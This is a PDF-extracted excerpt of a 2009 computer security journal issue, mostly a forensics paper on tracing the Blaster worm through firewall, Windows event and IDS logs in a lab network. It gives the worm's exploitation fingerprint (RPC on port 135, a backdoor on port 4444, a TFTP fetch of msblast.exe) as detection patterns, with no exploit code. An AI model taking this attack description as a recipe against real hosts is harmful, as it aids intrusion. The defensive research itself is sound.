Post on 30-May-2018
transcript
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 1/215
International Journal of
Computer Science
& Information Security
© IJCSIS PUBLICATION 2009
IJCSIS Vol. 4, No. 1 & 2, August 2009
ISSN 1947-5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 2/215
Editorial
Message from IJCSIS Editor
The Editorial Board presents to the research community the 4
th
volume of the International Journal of Computer Science and Information Security (IJCSIS,
Vol. 4, No. 1 & 2, August 2009). We pursue our commitment to quality
publication and high impact research dissemination and therefore, IJCSIS
Technical Program Committee has been very selective with a 29.5% paper
acceptance rate after peer-reviewing process. Besides our open access policy to
download all publications, all IJCSIS articles indexed in major academic or
scientific databases.
Moreover, this edition proposes a good blend of quality research papers in
computer networking, information & communication security, mobile &
wireless networking, QoS issues etc. We thank all authors who have submitted
and published their research papers in this issue and wish for long-term fruitful
research collaborations. Special thanks to anonymous reviewers for their service
to IJCSIS.
We hope that you will find this IJCSIS edition a useful state-of-the-art literature
reference.
Available at http://sites.google.com/site/ijcsis/
IJCSIS Vol. 4, No. 1 & 2,
August 2009 Edition
ISSN 1947-5500
© IJCSIS 2009, USA.
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 3/215
IJCSIS EDITORIAL BOARD
Dr. Gregorio Martinez Perez Associate Professor - Profesor Titular de Universidad
University of Murcia (UMU), Spain
Dr. Yong LiSchool of Electronic and Information Engineering,Beijing Jiaotong UniversityP.R. China
Dr. Sanjay JasolaProfessor and DeanSchool of Information and Communication Technology,
Gautam Buddha University,
Dr Riktesh Srivastava Assistant Professor, Information SystemsSkyline University College, University City of Sharjah,Sharjah, PO 1797, UAE
Dr. Siddhivinayak Kulk arniUniversity of Ballarat, Ballarat, Victoria
Australia
Professor (Dr) Mokhtar BeldjehemSainte-Anne UniversityHalifax, NS, Canada
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 4/215
TABLE OF CONTENTS
1. Tracing Technique for Blaster AttackSiti Rahayu S., Robiah Y., Shahrin S., Faizal M. A., Mohd Zaki M, Irda R.
Faculty of Information Technology and CommunicationUniveristi Teknikal Malaysia Melaka, Durian Tunggal, Melaka, Malaysia
2. Optimization of Bit Plane Combination for Efficient Digital Image Watermarking
Sushma Kejgir & Manesh Kokare, Electronics & Tele. Engineering, SGGS Institute of Engineering &Technology, Vishnupuri, Nanded, Maharashtra, India
3. Retrieval of Remote Sensing Images Using Colour & Texture Attribute
Priti Maheswary, Research Scholar, Department Of Computer Application, Maulana Azad National Institute of Technology, Bhopal, India Dr. Namita Srivastava, Assistant Professor, Department Of Mathematics, Maulana Azad National Instituteof Technology, Bhopal, India
4. Consideration Points: Detecting Cross-Site Scripting
Suman Saha, Dept. of Computer Science and Engineering, Hanyang University, Ansan, South Korea
5. Experimental Performances Analysis of Load Balancing Algorithms in IEEE 802.11
HAMDI Salah, Computer Sciences Department, ISSAT Of Sousse, Sousse, TunisiaSOUDANI Adel & TOURKI Rached, Physique Department, E μe Laboratory, Faculty Of Sciences Of Monastir, Monastir, Tunisia
6. Exploration of the Gap Between Computer Science Curriculum and Industrial I.T Skills
Requirements
Azeez Nureni Ayofe & Azeez Raheem Ajetola , Department of Maths & Computer Science, College of Natural and Applied Sciences, Fountain University, Osogbo, Osun State, Nigeria.
7. Visualization of Mined Pattern and Its Human Aspects
Ratnesh Kumar Jain & Dr. R. S. Kasana, Department of Computer Science & Applications, Dr. H. S. Gour,
University, Sagar, MP (India) Dr. Suresh Jain, Department of Computer Engineering, Institute of Engineering & Technology, Devi Ahilya University, Indore, MP (India)
8. Handwritten Farsi Character Recognition using Artificial Neural Network
Reza Gharoie Ahangar, Mohammad Farajpoor Ahangar Azad University of Babol branch Iran
9. Energy Efficient Location Aided Routing Protocol for Wireless MANETs
Mohammad A. Mikki, Computer Engineering Department, IUG, P. O. Box 108, Gaza, Palestine
10. Constraint Minimum Vertex Cover in K-Partite Graph: Approximation Algorithm and
Complexity Analysis
Kamanashis Biswas, Computer Science and Engineering Department, Daffodil International University,102, Shukrabad, Dhaka-1207 S.A.M. Harun, Right Brain Solution, Flat# B4, House# 45, Road# 27, Banani, Dhaka
11. Hardware Virtualization Support In INTEL, AMD And IBM Power Processors
Kamanashis Biswas, Lecturer, CSE Dept., Daffodil International University
12. Dynamic Multimedia Content Retrieval System in Distributed Environment
R. Sivaraman , R. Prabakaran, S. Sujatha Anna University Tiruchirappalli, Tiruchirappalli, India
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 5/215
13. Enhanced Mode Selection Algorithm for H.264 encoder for Application in Low Computational
power devices
Sourabh Rungta, CSE Department, RCET, Durg, India. Kshitij Verma, ABV-IIITM, Gwalior, India Neeta Tripathi, ECE Department., RSRCET, Durg, India. Anupam Shukla, ICT Department., ABV-IIITM, Gwalior, India.
14. Channel Equalization in Digital TransmissionMd. Taslim Arefin, Dept. of CSE, Faculty of Egineering, University of Development Alternative(UODA),
Dhaka, Bangladesh Kazi Mohammed Saidul Huq, Miguel Bergano & Atilio Gameiro, Research Engineer, Institute of Telecommunications, Aveiro, Portugal
15. An Enhanced Static Data Compression Scheme Of Bengali Short Message
Abu Shamim Mohammad Arif, Assistant Professor, Computer Science & Engineering Discipline, KhulnaUniversity, Khulna, Bangladesh.
Asif Mahamud, Computer Science & Engineering Discipline, Khulna University, Khulna, Bangladesh. Rashedul Islam, Computer Science & Engineering Discipline, Khulna University, Khulna, Bangladesh
16. QoS Provisioning Using Hybrid FSO-RF Based Hierarchical Model for Wireless Multimedia
Sensor NetworksSaad Ahmad Khan & Sheheryar Ali Arshad, Department of Electrical Engineering, University Of
Engineering & Technology, Lahore, Pakistan, 54890
17. Minimizing Cache Timing Attack Using Dynamic Cache Flushing (DCF) Algorithm
Jalpa Bani and Syed S. Rizvi,Computer Science and Engineering Department, University of Bridgeport, Bridgeport, CT 06601
18. A Survey of Attacks, Security Mechanisms and Challenges in Wireless Sensor Networks
Dr. G. Padmavathi, Prof and Head, Dept. of Computer Science, Avinashilingam University for Women,Coimbatore, India,Mrs. D. Shanmugapriya, Lecturer, Dept. of Information Technology, Avinashilingam University for Women,Coimbatore, India,
19. Computational Complexities and Breaches in Authentication Frameworks of BWA
Raheel Maqsood Hashmi, Arooj Mubashara Siddiqui, Memoona Jabeen, Khurram S. Alimgeer, Shahid A. Khan, Department of Electrical Engineering, COMSATS Institute of Information Technology Islamabad, Pakistan
20. Codebook Design Method for Noise Robust Speaker Identification based on Genetic Algorithm
Md. Rabiul Islam, Department of Computer Science & Engineering, Rajshahi University of Engineering &Technology, Rajshahi-6204, Bangladesh.Md. Fayzur Rahman, Department of Electrical & Electronic Engineering, Rajshahi University of
Engineering & Technology, Rajshahi-6204, Bangladesh.
21. A Step towards Software Corrective Maintenance: Using RCM model
Shahid Hussain, Namal University, Mianwali Dr. Bashir Ahmad, ICIT, Gomal University, D.I.KhanMuhammad Zubair Asghar, ICIT, Gomal University, D.I.Khan
22. Electronic Authority VariationM.N.Doja† and Dharmender Saini††,
Jamia Millia Islamia (CSE Department), New Delhi, India
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 6/215
23. A Novel Model for Optimized GSM Network Design
Alexei Barbosa de Aguiar, Plácido Rogério Pinheiro, Álvaro de Menezes S. Neto, Ruddy P. P. Cunha, Rebecca F. PinheiroGraduate Program in Applied Informatics, University of Fortaleza, Av. Washington Soares 1321, Sala J-30,
Fortaleza, CE, Brazil, 60811-905
24. A Study on the Factors That Influence the Consumers’ Trust on E-commerce Adoption
Yi Yi Thaw, Department of Computer and Information Sciences, Universiti Teknologi PETRONAS, Tronoh,Malaysia
Ahmad Kamil, Department of Computer and Information Sciences, Universiti Teknologi PETRONAS,Tronoh, Malaysia
Dhanapal Durai Dominic, Department of Computer and Information Sciences, Universiti Teknologi PETRONAS, Tronoh, Malaysia
25. The Uniformization Process of the Fast Congestion Notrification (FN)
Mohammed M. Kadhum MIEEE, and Suhaidi Hassan SMIEEE InterNetWorks Research Group, College of Arts and Sciences, Universiti Utara Malaysia, 06010 UUM Sintok, MALAYSIA
26. On The Optimality Of All-To-All Broadcast In k-ary n-dimensional Tori
Jean-Pierre Jung & Ibrahima Sakho, UFR MIM, Université de Metz, Ile du Saulcy BP 80794 - 57012 MetzCedex 01 – France
27. Resource Matchmaking Algorithm using Dynamic Rough Set in Grid Environment
Iraj Ataollahi, Mortza Analoui Iran University of Science and Technology/Computer Engineering Department, Tehran, Iran
28. Impact of Rushing attack on Multicast in Mobile Ad Hoc NetworkV. Palanisamy, Reader and Head (i/c), Department of Computer Science & Engineering, AlagappaUniversity, Karaikudi, Tamilnadu ,India
P. Annadurai, Lecturer in Computer Science, Kanchi Mamunivar Centre for Post Graduate Studies(Autonomous) , Lawspet, Puducherry, India.
29. A Hybrid multi objective particle swarm optimization method to discover biclusters inmicroarray data
S. Amirhassan Monadjemi, Department of Computer Engineering, Faculty of Engineering, University of Isfahan, Isfahan, 81746, IranMohsen lahkargir *, Department of Computer Engineering, Islamic Azad University, najafabad branch,
Isfahan, 81746, Iran Ahmad Baraani Dastjerdi, Department of Computer Engineering, Faculty of Engineering, University of Isfahan
30. Predictors Of Java Programming Self–Efficacy Among Engineering Students In A Nigerian
University
Philip Olu Jegede, Institute of Education, Obafemi Awolowo University, Ile-Ife, Nigeria
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 7/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 , 2009
Tracing Technique for Blaster AttackSiti Rahayu S., Robiah Y., Shahrin S., Faizal M. A., Mohd Zaki M, Irda R.
Faculty of Information Technology and Communication
Univeristi Teknikal Malaysia Melaka,
Durian Tunggal, Melaka,
Malaysiasitirahayu@utem.edu.my, robiah@utem.edu.my, shahrinsahib@utem.edu.my,
faizalabdollah@utem.edu.my,zaki.masud@utem.edu.my, irda@utem.edu.my
Abstract - Blaster worm of 2003 is still persistent, the infection
appears to have successfully transitioned to new hosts as the
original systems are cleaned or shut off, suggesting that the
Blaster worm, and other similar worms, will remain significant
Internet threats for many years after their initial release. This
paper is to propose technique on tracing the Blaster attack
from various logs in different OSI layers based on fingerprint
of Blaster attack on victim logs, attacker logs and IDS alert log.
The researchers intended to do a preliminary investigation
upon this particular attack so that it can be used for further
research in alert correlation and computer forensic
investigation.
Keyword; Tracing technique, Blaster attack, fingerprint, log
I. INTRODUCTION
The Blaster worm of 2003 infected at least 100,000Microsoft Windows systems and cost millions in damage. Inspite of cleanup efforts, an antiworm, and a removal toolfrom Microsoft, the worm persists [1]. According to [2],research on Blaster attack is significant due to the multitude
of malware such as Blaster worm has itself evolved into acomplex environment and has potential for reinfection byeither itself or another worm, to occur using the sameexploit.
Recent tools targeted at eradicating it appear to have hadlittle effect on the global population. In the persistentpopulation analysis, the infection appears to havesuccessfully transitioned to new hosts as the originalsystems are cleaned or shut off, suggesting that the Blasterworm, and other similar worms, will remain significantInternet threats for many years after their initial release andits suggested that the Blaster worm is not going away
anytime soon. Therefore, the objective of this paper is topropose technique on tracing the Blaster attack from variouslogs in different OSI layers. The researchers intended to doa preliminary investigation upon this particular attack so thatit can be used for further research in alert correlation andcomputer forensic investigation.
II. RELATED WORK
W32.Blaster.Worm is a worm that exploits the DCOMRPC vulnerability (described in Microsoft Security BulletinMS03-026) using TCP port 135. If a connection attempt toTCP port 135 is successful, the worm sends an RPC bindcommand and an RPC request command containing thebuffer overflow and exploit code. The exploit opens abackdoor on TCP port 4444, which waits for further
commands. The infecting system then issues a command tothe newly infected system to transfer the worm binary usingTrivial File Transfer Protocol (TFTP) on UDP port 69 fromthe infecting system and execute it.
The worm targets only Windows 2000 and WindowsXP machines. While Windows NT and Windows 2003Server machines are vulnerable to the aforementionedexploit (if not properly patched), the worm is not coded toreplicate to those systems. This worm attempts to downloadthe msblast.exe file to the %WinDir%\system32 directoryand then execute it.
The Blaster worm’s impact was not limited to a shortperiod in August 2003. According to [3], a published surveyof 19 research universities showed that each spent anaverage of US$299,579 during a five-week period torecover from the Blaster worm and its variants. The cost of this cleanup effort has helped solidify a growing view of worms not as acts of Internet vandalism but as seriouscrimes. Although the original Blaster.A author was nevercaught, authors of several other variants have beenapprehended.
There are various research techniques done by othersresearcher in detecting attack. It can either use signature-based, anomaly-based or specification-based. The
signature-based as described by [4] will maintain thedatabase of known intrusion technique and detects intrusionby comparing behaviour against the database whereas theanomaly-based detection techniques will analyses userbehaviour and the statistics of a process in normal situation,and it checks whether the system is being used in a differentmanner. [5] has described that this technique can overcomemisuse detection problem by focusing on normal systembehaviour rather than attack behaviour. The specification-
1 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 8/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 , 2009
based detection according to [6] will rely on programspecifications that describe the intended behaviour of security-critical programs. The research trend for detectingattack has move towards combination or hybrid of eithersignature-based with anomaly-based done by [7], [8] and [5]or specification-based with anomaly-based done by [9].
For the purpose of this preliminary experiment, the
researchers have selected only signature-based detectiontechnique and in future, intend to combine it with anomaly-based detection technique for further improvement of tracing attack.
System log files contain valuable evidence pertaining tocomputer attacks. However, the log files are often massive,and much of the information they contain is not relevant tothe network administrator. Furthermore, the files almostalways have a flat structure, which limits the ability to querythem. Thus, it is extremely difficult and time consuming toextract and analyse the trace of attacks from log files [10].This paper will select the most valuable attributes from a log
file that is relevance to the attack being traced. Our researchis preliminary experiment of tracing the Blaster.B attack indiverse log resources to provide more complete coverage of the attack space [11].
According to [12], the network attack analysis processinvolves three main procedures: initial response, mediaimaging duplication, and imaged media analysis. Ourproposed approach focuses on the procedure of mediaimaging duplication and imaged media analysis. This paperdescribes how procedure can be applied to the numerouslogs, which can derive the top facts in each of the diverseconnections and locate malicious events spread across the
network.
III. EXPERIMENT APPROACH
Our proposed approach in this preliminary experimentused four methods: Network Environment Setup, Attack Activation, Log Collection and Log Analysis and itsdepicted in Figure 1. The details of the method are discussedin the following sub-section.
Figure 1: Method use in the preliminary experiment
A. Network Environment Setup
The network setup for this experiment will refer to thenetwork simulation setup [13] done by the MIT Lincoln Laband it has been slightly modified using only Centos andWindows XP compared to MIT Lincoln Lab which using Linux, Windows NT, SunOS, Solaris, MacOS and Win98 tosuit our experiment’s environment. The network design is
as shown below in Figure 2.
Figure 2: Preliminary Network Design for Blaster Attack Simulation
This network design consists of two switches
configured to Vlan 3 (192.168.3.0) and Vlan 2
(192.168.2.0), one router, two servers for Intrusion
Detection System (IDS) and Network Time Protocol (NTP)
run on Centos 4.0, two victims run on Windows XP on each
Vlan and one attacker run on Vlan 2. The log files that
expected to be analysed are four types of log files ( personal
firewall log, security log, system log and application log)
that shall be generated by host level device and one log files
by network level device (alert log by IDS). Ethereal 0.10.7
[6] were installed in each host to verify the traffic between
particular host and other device and tcpdump script is
activated in IDS to capture the traffic for the whole trafficwithin Vlan 2 and Vlan 3.
B. Attack Activation
Event viewer and time synchronisation using NTPserver is configured before attack is launched. Then Blastervariant is installed and activated on the attacker machine.This experiment runs for 30 minutes. Once the victim
2 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 9/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 , 2009
machine is successfully infected by the Blaster, theexperiment is terminated.
C. Log Collection
Log is collected at two different OSI layers which areapplication layer and network layer. Each victim andattacker machine will generated personal firewall log,
security log, application log, system log and ethereal log.The IDS machine will generate alert log and tcpdump log.
Ethereal and tcpdump files are used to verify the simulationattack and compare it with the others log files. For thepurpose of this paper, both verification logs are notdiscussed due to limited page. The summary of the variouslog files generated is as shown in Table I.
TABLE I. Various log files generated from two different OSI layers
C. Log Analysis
In this network attack analysis process the researchershas implement the media imaging duplication using IDS andimaged media analysis by analysing logs generated in Table1. The objective of the log analysis is to identify the Blaster
attack by observing the specific characteristics of the Blasterattack which exploits the DCOM RPC vulnerability usingTCP port 135. This worm attempts to download themsblast.exe file to the %WinDir%\system32 directory andthen execute it. The exploit opens a backdoor on TCP port4444, which waits for further commands. In this analysis,the researchers have selected the valuable attributes that issignificance to the attack being traced as shown in Table II.
TABLE II. Selected Log Attribute
Log filenames Selected Log Attribute Variable
pfirewall.log • Source IP address
• Destination IPAddress
• Destination port
• Source port
• Action• Date
• Time
• SrcIP
• DstIP
• Dstport
• Srcport
• Act• D
• T
security.evt • Date
• Time
• Category
• D
• T
• Cat
application.evt
system.evt
alert.log • Date
• Time
• Source IP address
• Destination IPAddress
• Category
• D
• T
• SrcIP
• DstIP
• Cat
IV. PROPOSED TRACING TECHNIQUE
In order to identify the attacker, the researchers have
proposed a tracing technique as depicted in Figure 3,
consists of three elements: victim, attacker and IDS. The
algorithm used in each element will be elaborated in the
next sub-section.
Figure 3: Proposed Tracing Technique
A. Tracing Algorithm for Victim logs
In our tracing procedure, the tracing activity will be
primarily done at victim site by examining the Blaster
fingerprint for victim logs as shown in Figure 4. These
3 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 10/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 , 2009
Blaster fingerprint is derived from several studies done by
[14], [15], [16].
Figure 4: Fingerprint of Blaster attack in each selected victim logs
In this analysis, the researchers have specified192.168.3.13 as one of the victim and 192.168.2.150 as
attacker (refer to Figure 2). The tracing tasks are initiallystarted at the victim personal firewall log followed bysecurity log, system log and application log. The data can befurther analysed by referring to Blaster fingerprint forattacker logs by examine the attacker personal firewall andsecurity log. Figure 6, 9 and 12 is the relevant informationthat has been extracted from selected logs.
Figure 5 shows the tracing algorithm for each selectedvictim logs based on Blaster attack fingerprint as in Figure4.
The aim of these tracing tasks is to examine the traceleft by the Blaster in the selected log. The trace is based onthe Blaster attack fingerprint which primarily done at personal firewall log. In these tracing tasks, the researchershave manipulated the attributes selected in Table II. Thesearching start with the victim IP address is 192.168.3.13,and the action is OPEN-BOUNDED which show theattacker is trying to open the connection. The protocol usedis TCP and the destination port is 135 which show thatBlaster attack attempt to establish connection.
Where,x = Victim Hosty = Attacker Host
Victim Personal firewall log tracing algorithmInput Action, Protocol, Destination Port
If (Action = Open-Inbound) and (Protocol = TCP)
and (Destination Port = 135)
Date = DFWx
Time = TFW1 x Source IP = SrcIP
x
Destination IP = DestIPx
Source Port = SrcPortax
Print Source IP, Date, Time, Source Port,
Destination IP, Action, Protocol, Destination
Port
If (Action = Open) and (Protocol = TCP) and
(Destination Port = 4444) and (Date = DFWx)
and (Time >= TFW1x) and
(Source IP = SrcIPx) and (Destination IP =
DestIPx)
Time = TFW2x
Source Port = SrcPortex
Print Source IP, Date, Time, Source
Port, Destination IP, Action, Protocol,
Destination Port
End
End
Victim Security log tracing algorithmInput Date (DFW
x)
Input Time (TFW2x)
Input AuditCategory
If (Date = DFWx) and (Time >= TFW2
x) and
(AuditCategory = ‘\system32\svchost.exe,
generated an application error’)
Time = TApplx
Date = DApplx
Print Time, Date, AuditCategory
End
Victim System log tracing algorithm
Input Date (DApplx
)Input Time (TApplx)
Input AuditCategory
If (Date = DApplx) and (Time >= TAppl
x) and
(AuditCategory = ‘The Remote Procedure Call
(RPC) service terminated unexpectedly’)
Time = TimeSysx
Date = DateSysx
Print Time, Date, AuditCategory
End
Victim Application log tracing algorithmInput Date (DSys
x)
Input Time (TSysx)
Input AuditCategory
If (Date = DSysx) and (Time >= TSys
x) and
(AuditCategory = ‘Windows is shutting down’)
Time = TimeSecx
Date = DateSec
x
Print Time, Date, AuditCategory
End
Figure 5: Tracing algorithm for Victim logs
4 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 11/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 , 2009
Victim Personal firewall log2009-05-07 14:13:34 OPEN-INBOUND TCP 192.168.2.150
192.168.3.13 3284 135 - - - - - - - -2009-05-07 14:14:01 DROP TCP 192.168.2.150
192.168.3.13 3297 4444 48 S 862402054 0 64240 -- -
Victim Security log 5/7/2009 2:20:03 PM Security
Success Audit System Event 513 NT AUTHORITY\SYSTEM AYU Windows is shuttingdown. All logon sessions will be terminated bythis shutdown.
Victim System log 5/7/2009 2:19:00 PM Service Control
Manager Error None 7031 N/A AYU
The Remote Procedure Call (RPC) serviceterminated unexpectedly. It has done this 1
time(s). The following corrective action will
be taken in 60000 milliseconds: Reboot the
machine.
5/7/2009 2:19:00 PM USER32 Information
None 1074 NT AUTHORITY\SYSTEM AYU
The process winlogon.exe has initiated the
restart of AYU for the following reason: No
title for this reason could be found
Minor Reason: 0xff
Shutdown Type: reboot
Comment: Windows must now restart because the
Remote Procedure Call (RPC) service terminated
unexpectedly
Victim Application log 5/7/2009 2:20:01 PM EventSystem Error
(50) 4609 N/A AYU The COM+
Event System detected a bad return code during
its internal processing. HRESULT was 800706BA
from line 44 of
d:\nt\com\com1x\src\events\tier1\eventsystemobj
.cpp. Please contact Microsoft Product Support
Services to report this error.
5/7/2009 2:19:00 PM DrWatson
Information None 4097 N/A AYU
The application,
C:\WINDOWS\system32\svchost.exe, generated anapplication error The error occurred on
05/07/2009 @ 14:19:00.441 The exception
generated was c0000005 at address 0018759F
(<nosymbols>)
5/7/2009 2:14:00 PM Application Error
Error (100) 1000 N/A AYU
Faulting application svchost.exe, version
5.1.2600.0, faulting module unknown, version
0.0.0.0, fault address 0x00000000.
5/7/2009 2:20:03 PM EventLog
Information None 6006 N/A AYU
The Event log service was stopped.
Figure 6: Extracted data from Victim logs
From these trace, the source IP address (SrcIPx) andsource port of potential attacker is known where source IPaddress is 192.168.2.150, source port (SrcPorta
x) is 3824 andthe date and time is 2009-05-07 14:13:34 also known toshows when the attack is happen.
Subsequently, to trace whether the attack was exploited,the log is further search on the same date and time withinthe range of the Blaster attack attempt to establishconnection. The destination IP address (DestIPx) is victimIP address, the source IP address (SrcIPx) is the potentialattacker IP address, the action is DROP, protocol used isTCP and destination port is 4444. From this trace, thepotential attacker source port is known and it indicates that
the Blaster is exploited using port 4444. This attack can befurther verified by examining the personal firewall log atthe machine of the potential attacker.
To support the information obtained in personal
firewall log, further investigation done in the security log,
system log and application log. The effect of the
exploitation can be traced by looking at the message
embedded in the application log, system log and security log
which shows message
“C:\WINDOWS\system32\svchost.exe, generated an
application error ”, “Windows must now restart because the
Remote Procedure Call (RPC) service terminated
unexpectedly” and “Windows is shutting down. All logon
sessions will be terminated by this shutdown” respectively.
All of these messages shown the effect of Blaster attack,
which it exploits the RPC services. The highlighted data in
Figure 6 is extracted by using the tracing algorithm in
Figure 5 accordingly.
B. Tracing Algorithm for Attacker logs
The tracing algorithm for tracing the attacker logs inFigure 8 is based on Blaster attack fingerprint in Figure 7.The same tracing step in victim logs is used in investigatingthe attacker logs. The only difference is the action is OPENand extra information obtained from previous tracing tasks:source port (SrcPorta
x), date (DFWx) and time (TFW1
x) is usedto verify the existence of communications between attackerand victim machine on port 135.
Figure 7: Fingerprint of Blaster attack in each selected attacker log
5 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 12/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 , 2009
Then, to verify that there is an exploitation done byattacker to victim machine, the main attributes used in the personal firewall log are destination IP address, action isOPEN, protocol is TCP, destination port is 4444, source port(SrcPorte
x), date (DFWx) and time (TFW2
y).
To validate the information obtained in the attacker personal
firewall log, further analysis done in the security log, system
log and application log. The process created is found in thesecurity log with the message “ A new process has been
created and the Image File Name: C:\Documents and
Settings\aminah\Desktop\Blaster.exe”.
Where,x = Victim Hosty = Attacker Host
Attacker Personal firewall log tracing algorithmInput Action, Protocol, Destination Port
Input Date (obtained from tracing victim log,
DFWx)
Input Time (obtained from firewall victim log,
TFW1x)
Input Source IP (obtained from firewall victimlog, SrcIPx)
Input Destination IP (obtained from firewall
victim log, DestIPx)
Input Source Port to attempt attack (obtained
from firewall victim log, SrcPortax)
Input Source Port to exploit attack (obtained
from firewall victim log, SrcPortex)
If (Action = Open) and (Protocol = TCP) and
(Destination Port = 135) and (Date = DFWx)
and(Time <= TFW1x) and (Source IP = SrcIPx)
and (Destination IP = DestIPx) and (Source
Port = SrcPortax)
Time = TFW1y
Date = DFWy
Print Source IP, Destination IP, Date,
Time, Source Port, Destination Port,Protocol, Action
If (Action = Open) and (Protocol = TCP) and
(Destination Port = 4444) and (Date = DFWy)
and (Time >= TFW1y) and (Source IP = SrcIPx)
and (Destination IP = DestIPx) and (Source
Port = SrcPortex)
Time = TFW2y
Print Source IP, Date, Time, Source
Port,
Destination IP, Action, Protocol,
Destination Port
End
End
Attacker Security log tracing algorithm
Input Date (DFWy
)Input Time (TFW2
y)
Input AuditCategory
If (Date = DFWy) and (Time >= TFW2
y) and
(AuditCategory = ‘Windows is shutting down’)
Time = TimeSecy
Date = DateSecy
Print Time, Date, AuditCategory
End
Figure 8: Tracing algorithm for Attacker logs
The highlighted data in Figure 9 is extracted by usingthe tracing algorithm in Figure 8 accordingly.
From the tracing, there is an evidence shows that theattack is launched by this attacker machine (192.168.2.150)at 2009-05-07 14:13:33 which is concurrent with theextracted data in Figure 6. Hence, the attacker can beidentified using this tracing algorithm.
Attacker Personal firewall log2009-05-07 14:13:33 OPEN TCP 192.168.2.150 192.168.3.12
3283 135 - - - - - - - -
2009-05-07 14:13:33 OPEN TCP 192.168.2.150 192.168.3.133284 135 - - - - - - - -
2009-05-07 14:13:33 OPEN TCP 192.168.2.150 192.168.3.14
3285 135 - - - - - - - -
2009-05-07 14:13:33 OPEN TCP 192.168.2.150 192.168.3.15
3286 135 - - - - - - - -
2009-05-07 14:13:35 OPEN TCP 192.168.2.150 192.168.3.12
3296 4444 - - - - - - - -
2009-05-07 14:13:56 OPEN TCP 192.168.2.150 192.168.3.133297 4444 - - - - - - - -
2009-05-07 14:14:11 CLOSE TCP 192.168.2.150 192.168.3.12
3283 135 - - - - - - - -
2009-05-07 14:14:11 CLOSE TCP 192.168.2.150 192.168.3.13
3284 135 - - - - - - - -2009-05-07 14:14:11 CLOSE TCP 192.168.2.150 192.168.3.15
3286 135 - - - - - - - -
2009-05-07 14:15:11 CLOSE TCP 192.168.2.150 192.168.3.12
3296 4444 - - - - - - - -
2009-05-07 14:15:11 CLOSE TCP 192.168.2.150 192.168.3.133297 4444 - - - - - - - -
2009-05-07 14:15:11 CLOSE TCP 192.168.2.150 192.168.3.34
3307 135 - - - - - - - -
Attacker Security log5/7/2009 2:13:08 PM Security Success Audit
Detailed Tracking 592 RAHAYU2\aminah
RAHAYU2 " A new process has been created:
New Process ID: 1640
Image File Name: C:\Documents andSettings\aminah\Desktop\Blaster.exe
Creator Process ID: 844
User Name: aminah
Domain: RAHAYU2Logon ID: (0x0,0x17744)
Figure 9: Extracted data from Attacker logs
C. Tracing Algorithm for IDS logs
The Blaster attack fingerprint in Figure 10 is the base fortracing algorithm in IDS alert logs as depicted in Figure 11.
Figure 10: Fingerprint of Blaster attack in IDS log
Blaster fingerprintat IDS Alert logs
Activity
Portsweep(TCP
portscan)
AlarmAttacker
IPaddress
6 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 13/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4 , No. 1 , 2009
To confirm that there is an exploitation done by attacker,extra information can be obtained from IDS alert log. Themain attributes used in the IDS alert log are date, time,Source IP Address and destination IP address. If thedestination IP address does not exist, the alert has generatedfalse positive alert. However, existence of source IP addressis good enough to verify that this source IP address hadlaunched an attack as reported as portsweep activity in IDS
alert log shown in Figure 12.
Input Date (obtained from victim firewall log,
DFWx)
Input Start Time (obtained from victim firewall
log, TFW1x)
Input End Time (obtained from victim firewall log,
TFW2x)
Input Source IP (obtained from victim firewall
log, SrcIPx)
Input Destination IP (obtained from victim
firewall log, DestIPx)
If (Date = DFWx) and (TFW1
x=<Time>= TFW2
x) and
(Source IP = SrcIPx) and (Destination IP =
DestIP
x
)Time = TIDS
Print Date, Time, Source IP, Destination IP,
Alert Message
Else
If (Date = DFWx) and (TFW1
x=<Time>= TFW2
x) and
(Source IP = SrcIPx)
Time = TIDSPrint Date, Time, Source IP, Destination IP,
Alert Message
End
End
Figure 11: IDS tracing algorithm
[**] [122:3:0] (portscan) TCP Portsweep [**]
[Priority: 3]05/07-14:10:56.381141 192.168.2.150 ->
192.168.3.1
PROTO:255 TTL:0 TOS:0x0 ID:14719 IpLen:20
DgmLen:158
[**] [122:3:0] (portscan) TCP Portsweep [**]
[Priority: 3]
05/07-14:11:43.296733 192.168.2.150 ->
192.168.3.34
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20
DgmLen:162 DF
Figure 12: Extracted data from IDS alert log
The extracted data depicted from Figure 12, verified
that the source IP address (192.168.2.150) is the attackerdue to the port scanning alarm generated by the IDS. Thus,
all the three tracing algorithm have the capability to identify
the attacker.
V. CONCLUSION AND FUTURE WORKS
In this study, the researchers have reviewed and
analysed the Blaster attack from various logs in different
OSI layers and researchers’ approach focuses on the
procedure of media imaging duplication and imaged media
analysis. Researchers have selected the most valuable
attributes from the log files that are relevance to the attack
being traced. From the analysis researcher has propose a
technique on tracing the Blaster attack using specific tracing
